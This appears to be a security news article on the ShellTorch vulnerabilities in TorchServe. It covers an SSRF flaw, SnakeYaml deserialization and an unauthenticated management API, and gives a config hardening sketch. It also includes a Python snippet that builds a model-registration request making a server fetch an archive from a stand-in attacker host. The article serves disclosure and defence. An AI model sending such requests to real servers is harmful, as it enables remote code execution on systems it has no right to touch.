A set of critical vulnerabilities in the TorchServe machine learning framework has been discovered, posing a significant threat to artificial intelligence (AI) models. The bugs affect popular machine learning services offered by Amazon and Google, as well as various other companies. The vulnerabilities highlight the susceptibility of AI applications to open source bugs and the potential for malicious actors to exploit them.
TorchServe is an open source framework used for deploying deep-learning models based on the PyTorch machine learning library in production environments. It is maintained by Amazon and Meta, and is widely used by large organizations including Walmart, Amazon, Microsoft Azure, Google Cloud, and others. However, the recently discovered vulnerabilities in TorchServe have raised serious concerns regarding the security of AI models.
If successfully exploited, these vulnerabilities could allow threat actors to access confidential data within AI models, insert malicious models into production environments, manipulate the results of machine learning models, and gain complete control over servers. The potential for unauthorized access and other malicious actions is particularly concerning, considering that thousands of vulnerable instances of the software are publicly exposed on the internet.
The vulnerabilities, collectively referred to as “ShellTorch” by the cybersecurity firm Oligo, which discovered them, have been given critical severity ratings. One of the vulnerabilities, CVE-2023-43654, is a server-side request forgery (SSRF) flaw that enables remote code execution (RCE). Another, CVE-2022-1471, involves a Java deserialization RCE. The third issue stems from the default configuration of TorchServe, which exposes a critical management API to the internet. Many organizations and projects built on TorchServe have not changed the default configuration, leaving them with a major security exposure.
According to Oligo researchers, the misconfiguration affects self-managed services of major machine learning providers such as Amazon AWS SageMaker and Google Vertex AI, as well as several other projects built on TorchServe. This misconfiguration is particularly problematic because the management interface can be accessed without any authentication, allowing anyone to exploit the vulnerability.
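The default binding can be tightened in TorchServe's `config.properties` file. A minimal sketch using TorchServe's documented configuration keys follows; the loopback addresses reflect the standard hardening advice, while the allow-list URL is a hypothetical placeholder for an organization's own model registry:

```properties
# Bind the inference and management APIs to loopback instead of all interfaces
inference_address=http://127.0.0.1:8080
management_address=http://127.0.0.1:8081

# Restrict where model archives may be fetched from (comma-separated regex allow-list;
# the host below is a hypothetical internal registry)
allowed_urls=https://models.internal.example/.*
```

Restricting `allowed_urls` was the mitigation associated with the SSRF fix, since by default TorchServe would fetch model archives from any URL supplied to the management API.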
While correct configuration of the management interface can close one major attack vector, additional vectors remain. Oligo identified one of these as CVE-2023-43654, the SSRF flaw in the TorchServe API, which allows attackers to upload a malicious model into a production environment and achieve arbitrary code execution. Furthermore, CVE-2022-1471 is an RCE vulnerability in SnakeYaml, a YAML parsing library used by TorchServe. By uploading a machine learning model containing a malicious YAML file, attackers can trigger deserialization that leads to RCE on the underlying server.
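The model-registration vector can be illustrated with a short sketch. TorchServe's documented management API registers a model fetched from a caller-supplied URL via `POST /models?url=<archive-url>`; if that API is exposed and the URL allow-list is unrestricted, the archive can come from anywhere. The hosts and archive name below are hypothetical, and the request is only constructed, never sent:

```python
from urllib.parse import urlencode

def register_model_request(api_base: str, model_url: str) -> str:
    """Build the management-API model-registration URL (constructed only, not sent)."""
    return f"{api_base}/models?{urlencode({'url': model_url})}"

# Hypothetical exposed management API and attacker-hosted .mar archive
req = register_model_request(
    "http://victim.example:8081",
    "https://attacker.example/evil.mar",
)
print(req)
```

An attacker who can reach the unauthenticated management port needs nothing more than a request of this shape to pull their own model archive into the serving environment, which is why binding the API to loopback and constraining `allowed_urls` both matter.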
The discovery of these vulnerabilities emphasizes the risks associated with AI applications and their exposure to open source code. The consequences of these vulnerabilities are amplified in the realm of AI, given the wide range of use cases for large language models and other AI technologies. Exploiting vulnerabilities like ShellTorch can enable attackers to manipulate AI models, leading to the generation of misleading answers and other destructive outcomes.
Gal Elbaz, co-founder and CTO of Oligo, notes that AI is a groundbreaking technology with tremendous potential, but one that also presents new risks that must be addressed. As AI infrastructure is increasingly adopted, new strategies and measures must be implemented to protect against these vulnerabilities. The evolution of security practices is crucial to safeguarding AI infrastructure and mitigating the risks associated with AI applications.

